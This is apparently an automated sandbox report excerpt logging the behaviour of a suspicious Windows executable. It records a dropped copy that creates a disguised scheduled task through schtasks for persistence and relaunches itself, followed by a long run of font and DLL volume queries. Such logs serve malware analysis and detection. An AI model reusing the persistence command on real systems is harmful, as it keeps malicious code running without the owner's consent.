                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Users\user\Desktop\2i3Lj7a8Gk.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
